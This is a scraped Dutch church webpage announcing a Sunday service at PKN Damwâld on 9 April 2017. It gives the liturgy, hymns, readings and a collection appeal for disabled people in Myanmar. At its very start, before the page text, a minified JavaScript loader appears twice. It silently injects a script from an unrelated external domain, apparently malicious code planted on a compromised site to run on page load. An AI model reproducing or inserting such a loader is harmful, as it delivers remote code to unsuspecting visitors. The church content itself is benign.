;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 9 april 2017 9:30 uur - PKN Damwâld
zondag 9 april 2017
09:30 uur
Koffie na de dienst

Kerkdienst zondag 9 april 2017 9:30 uur

Thema: Voorbereiding Heilig Avondmaal

Informatie

Voorganger:Ds. W.J. van Dijk, Surhuisterveen
Organist:Nienke van der Heide-Visser
Thema:Voorbereiding Heilig Avondmaal
Mededeling:Koffie na de dienst
Liturgie
lied voor de dienst ELB 377: 1,2,3
Welkom en mededelingen
Aanvangslied psalm 116: 1,2,3
Stil gebed Votum en Groet .
We zingen: ELB 364: 1,2,3
Leefregel 1 Petrus 4: 7-16
We zingen: gezang 473: 1,2,6,9
Gebed om Gods Geest .
We lezen: Markus 15: 1-15
We zingen: gezang 178: 1,6,7
Prediking
We zingen: gezang 280: 1,2,3
Voorbereidingsvragen
We zingen: ELB 308: 1,3
Dankgebed en voorbede .
Collecte
We zingen: gezang 293: 1,3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Steun gehandicapten in Myanmar

In Myanmar behoren mensen met een handicap vaak tot de allerarmsten. Door hun handicap hebben zij nauwelijks toegang tot zorg, onderwijs en werk. The Leprosy Mission International-Myanmar (TLMI-M) is een partnerorganisatie van Kerk in Actie die zich inzet om de toegang tot onderwijs, werk, inkomen en zorg voor mensen met lepra of een lichamelijke handicap te verbeteren. TLMI-M stimuleert mensen met een lichamelijke handicap om zich te ontwikkelen, zowel geestelijk als lichamelijk. Dit doet zij bijvoorbeeld door het geven van vaktrainingen, het verstrekken van microkredieten en het motiveren van bedrijven om gehandicapten in dienst te nemen. Daarnaast ondersteunt TLMI-M mensen met een handicap bij integratie of re-integratie in hun gemeenschap. Ook kunnen zowel kinderen als volwassenen bij TLMI-M terecht voor medische zorg, zoals fysiotherapie en logopedie. Voor 31 euro ontvangt één gehandicapte of de ouders van een gehandicapt kind een klein startkapitaal om een eigen bedrijf te starten. Uw gift maakt het mogelijk dat mensen met een handicap vaktrainingen kunnen volgen, met behulp van een microkrediet een eigen bedrijf kunnen starten en fysiotherapie krijgen. Doet u ook mee?

Tweede collecte: Kerk
Uitganscollecte: Kerk